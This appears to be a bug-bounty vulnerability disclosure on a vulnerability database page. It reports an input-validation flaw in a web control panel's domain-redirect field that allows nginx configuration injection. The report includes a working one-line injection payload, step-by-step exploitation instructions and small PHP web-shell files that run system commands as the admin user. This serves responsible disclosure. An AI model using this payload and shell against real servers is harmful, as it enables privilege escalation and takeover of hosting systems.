Lucene search

Redstarp2357C0390-631C-4684-B6E1-A6D8B2453D66

HistoryJul 26, 2022 - 8:33 p.m.

Improper Input Validation Leads to Privilege Escalation and Denial of Service

2022-07-2620:33:51

redstarp2

www.huntr.dev

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

6.5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

0.001 Low

EPSS

Percentile

40.4%

JSON

Description

Improper input validation allows an attacker to privilege escalation and can make crash nginx server.

There is no input validation in the v-add-web-domain-redirect#L82, and “v-redirect-custom” input on the “Edit Web Domain” page, inputs are written directly to the /home/user/conf/web/domain.com/nginx.conf_redirect file. This file is included in /home/user/conf/web/domain.com/nginx.conf file.


/home/user/conf/web/domain.com/nginx.conf

...
location ~ /\.(?!well-known\/|file) {
       deny all;
       return 404;
    }

    include /home/test/conf/web/poc.com/nginx.conf_*;
}

/home/user/conf/web/domain.com/nginx.conf_redirect file before payload (input is “asd”)


if ($host != "asd") {
   return 301 $scheme://asd$request_uri;
}

/home/user/conf/web/domain.com/nginx.conf_redirect file after payload


if ($host != "redStar$request_uri; ## " ) {}   location /adminShell.php { alias /home/test/web/poc.com/public_html/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-server.talhagunay.com.sock;  } if ( $host = false ) { #") {
   return 301 $scheme://redStar$request_uri; ## " ) {}   location /adminShell.php { alias /home/test/web/poc.com/public_html/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-server.talhagunay.com.sock;  } if ( $host = false ) { #$request_uri;
}

Proof of Concept

Payload ( has to be one line! )

redStar$request_uri; ## " ) {}   location /adminShell.php { alias [FULLPATHINFO]; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-[HOSTNAME].sock;  } if ( $host = false ) { #

Exploiting

[0] login as user

[1] Create a domain in dashbard

[2] go to Files in top bar

[3] go to “public_html” folder and create a php file contains like below, visit php file with browser, prepare your payload with fullpath and hostname information.

x.php

&lt;?php

echo  getcwd();
echo "<br>";
system("hostname");

[4] go to “Edit Web Domain” page in dashboard, select “Enable domain redirection” then select “Redirect visitors to a custom domain or web address”, enter payload to text box and click save button.

[5] go to “public_html” folder, create a php file named adminShell.php

adminShell.php


&lt;?php

system("id; whoami;");

[6] Visit /adminShell.php with browser, commands running as “admin” user.

PoC Video

https://drive.google.com/file/d/1ynnw0C-5dbtxW21aLt4jemUPrCthyXEj/view?usp=sharing

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

6.5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

0.001 Low

EPSS

Percentile

40.4%

JSON

Related for 357C0390-631C-4684-B6E1-A6D8B2453D66